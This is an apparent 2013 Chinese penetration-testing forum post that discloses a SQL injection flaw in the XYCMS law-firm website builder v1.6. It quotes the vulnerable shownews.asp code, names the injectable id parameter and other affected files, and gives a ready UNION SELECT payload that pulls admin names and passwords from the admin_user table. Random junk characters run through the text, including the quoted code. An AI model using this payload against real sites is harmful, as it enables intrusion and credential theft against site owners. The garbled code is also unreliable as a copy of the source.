中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
& o7 d7 I! T+ Z/ i  x # j! n3 x( g, f; e! q0 O. E
淫荡分割线8 e+ }  ?' ~* b+ @& v
--------------------------------------------------------2 ~" g8 h4 B" i
, J; e$ `- |6 f* I: z, K
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)0 C. S9 c2 f+ _+ \4 I
源码地址:http://down.chinaz.com/soft/29233.htm" y7 p0 H* W) J
; Y" _2 l- L' s4 q# M9 _# b
漏洞文件:shownews.asp5 \5 M, t. g3 @" p/ K- T, ]# P
漏洞代码:7-13行1 _2 z7 t( F. A' f( P. s9 s* g

. Y; r& s. c# @' {/ M / z3 e8 l9 ^+ K# v; |  Q; {
<% 9 y  k; m1 W$ z6 o+ M7 Z
id=request.QueryString("id")
4 i+ ~6 w3 r  u' Z3 T& G( {    " p( N3 D5 i9 ~, Y' o) t. i, Z
set snews=server.createobject("adodb.recordset")
' G+ i4 A. h. F9 gexec="select * from [news] where id="&id3 }1 Z& j; h, }) t. U$ }
snews.open exec,conn,1,1
' V: [1 H$ D( E# b- W%>
. c" G* A) r* G/ [- M
6 M" o2 @5 Q  j9 y7 p" x
& }/ I6 D7 ~3 T% l) b; y$ n( E6 V什么过滤都没有  直造成注入2 g$ E' L$ h# [  `4 K1 x/ t% m- C8 j
8 A8 D# _' Z! U1 P5 l* p2 E* y
注入点:http://127.0.0.1:99/shownews.asp?id=xx. U# \! ]: @5 K; i
& E/ Y* U+ b# `" m. O3 g1 I. O& @/ t
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找) X5 k0 ~* S; W% J) n, x2 F) M0 q% @1 v% {
. O/ f' W/ D6 u; u8 J; L" j9 |# F8 K
) D4 g1 r, [, N
exp: union select 1,admin,password,4,5,7 from admin_user
6 L% c5 A' E  m: \& |- M
6 j7 M$ y, t1 P( @0 J9 L7 }



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2